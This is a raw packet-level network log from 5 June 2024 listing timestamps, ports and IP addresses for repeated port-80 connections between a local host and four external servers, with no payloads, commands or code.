Jun 5, 2024 18:28:36.960380077 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960392952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960398912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960407019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960417032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960418940 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960458040 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960469007 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960469961 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960469961 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960486889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960508108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960513115 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960522890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960534096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960536957 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960568905 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960568905 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960572958 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960582972 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960599899 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960608959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960618973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960622072 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960629940 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960639954 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960654974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960655928 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960655928 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960670948 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960694075 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960709095 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960720062 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960736990 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960731030 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960747957 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960757971 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960774899 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960797071 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960968018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960978985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960989952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960993052 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961000919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961011887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961011887 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961025953 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961042881 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961049080 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961055040 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961062908 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961066008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961076021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961081982 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961086988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961105108 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961105108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961116076 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961127043 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961133957 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961144924 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961155891 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961167097 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961174965 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961177111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961174965 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961188078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961198092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961199999 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961227894 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961227894 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961236954 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961268902 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961268902 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961329937 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961332083 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961436987 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961463928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961481094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961491108 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961504936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961507082 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961517096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961527109 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961527109 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961544037 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961555004 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961564064 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961565971 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961565971 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961575031 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961585999 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961601019 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961610079 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961632013 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961649895 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961672068 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961684942 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961733103 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961757898 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961790085 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961813927 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961815119 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.961865902 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.961883068 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.962135077 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.069566965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069581985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069592953 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069720984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069739103 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069751024 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069761038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069772005 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069782019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069792032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069802999 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069812059 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069818020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069823027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069833994 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069838047 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.069845915 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069870949 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069885969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069896936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069906950 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069916964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069926977 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069932938 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.069932938 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.069937944 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069947958 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069948912 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.069960117 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.069967031 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.069993019 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070107937 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070131063 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070147038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070158005 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070168018 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070168018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070194006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070209980 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070211887 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070211887 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070219994 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070230961 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070240974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070249081 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070249081 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070251942 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070262909 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070272923 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070283890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070286036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070286036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070297003 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070307970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070317984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070323944 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070328951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070338964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070348978 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070359945 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070359945 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070369959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070380926 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070388079 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070388079 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070391893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070401907 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070410013 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070413113 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070422888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070432901 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070434093 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070444107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070451021 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070453882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070465088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070476055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070477009 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070487022 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070497990 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070497990 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070508003 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070513964 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070518970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070528984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070538044 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070539951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:37.070565939 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:37.070616961 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:41.886734009 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:41.886826992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:41.890011072 CEST	49732	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:41.895209074 CEST	80	49732	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:41.895319939 CEST	49732	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:41.897675991 CEST	49732	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:41.904596090 CEST	80	49732	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:43.399303913 CEST	49732	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:43.404525995 CEST	80	49732	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:43.404680967 CEST	49732	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:44.420213938 CEST	49733	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:44.425347090 CEST	80	49733	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:44.425476074 CEST	49733	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:44.430041075 CEST	49733	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:44.434988976 CEST	80	49733	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:45.947151899 CEST	49733	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:45.952992916 CEST	80	49733	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:45.954658031 CEST	49733	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:46.979547024 CEST	49734	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:46.984539986 CEST	80	49734	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:46.990525007 CEST	49734	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:46.992423058 CEST	49734	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:46.997308969 CEST	80	49734	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:46.997400999 CEST	80	49734	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:48.509955883 CEST	49734	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:48.515301943 CEST	80	49734	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:48.516529083 CEST	49734	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:49.527017117 CEST	49735	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:49.531871080 CEST	80	49735	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:49.532475948 CEST	49735	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:49.534404039 CEST	49735	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:49.539303064 CEST	80	49735	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:50.189184904 CEST	80	49735	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:50.240963936 CEST	80	49735	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:50.241157055 CEST	49735	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:50.242409945 CEST	49735	80	192.168.2.7	172.82.177.221
Jun 5, 2024 18:28:50.248215914 CEST	80	49735	172.82.177.221	192.168.2.7
Jun 5, 2024 18:28:55.762430906 CEST	49736	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:55.767263889 CEST	80	49736	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:55.767430067 CEST	49736	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:55.769731045 CEST	49736	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:55.774578094 CEST	80	49736	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:56.462140083 CEST	80	49736	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:56.462156057 CEST	80	49736	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:56.462598085 CEST	49736	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:56.519788027 CEST	80	49736	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:56.520505905 CEST	49736	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:57.274235964 CEST	49736	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:58.294521093 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:58.299453020 CEST	80	49737	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:58.299567938 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:58.302217007 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:58.307235956 CEST	80	49737	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:59.200982094 CEST	80	49737	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:59.200992107 CEST	80	49737	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:59.201189041 CEST	80	49737	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:59.201198101 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:59.201390982 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:59.202105999 CEST	80	49737	15.204.0.108	192.168.2.7
Jun 5, 2024 18:28:59.202234030 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:28:59.839165926 CEST	49737	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:00.858517885 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:00.892082930 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:00.894637108 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:00.898577929 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:00.903563976 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:00.903816938 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:01.627319098 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:01.627338886 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:01.627494097 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:01.628508091 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:01.628509045 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:01.646755934 CEST	80	49738	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:01.652504921 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:02.399333954 CEST	49738	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:03.418103933 CEST	49739	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:03.423158884 CEST	80	49739	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:03.423522949 CEST	49739	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:03.428524971 CEST	49739	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:03.433490038 CEST	80	49739	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:04.128642082 CEST	80	49739	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:04.128660917 CEST	80	49739	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:04.129225969 CEST	49739	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:04.186151981 CEST	80	49739	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:04.186259985 CEST	49739	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:04.194729090 CEST	49739	80	192.168.2.7	15.204.0.108
Jun 5, 2024 18:29:04.199588060 CEST	80	49739	15.204.0.108	192.168.2.7
Jun 5, 2024 18:29:17.373126984 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:17.378050089 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:17.378256083 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:17.382042885 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:17.386909008 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210161924 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210196972 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210216999 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210236073 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210253954 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210269928 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:18.210275888 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210290909 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.210334063 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:18.330960989 CEST	80	49740	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:18.331639051 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:18.886573076 CEST	49740	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:19.902919054 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:19.907888889 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:19.907972097 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:19.910940886 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:19.915906906 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773403883 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773430109 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773446083 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773483038 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773490906 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773498058 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:20.773534060 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:20.773660898 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.773699045 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:20.911050081 CEST	80	49741	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:20.914995909 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:21.415059090 CEST	49741	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:22.437340975 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:22.442280054 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:22.442401886 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:22.445214987 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:22.450118065 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:22.450227976 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.273221970 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.273247957 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.273262024 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.273279905 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.273323059 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.273356915 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:23.273399115 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:23.393640041 CEST	80	49742	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:23.393775940 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:23.961852074 CEST	49742	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:24.980503082 CEST	49743	80	192.168.2.7	194.9.94.86
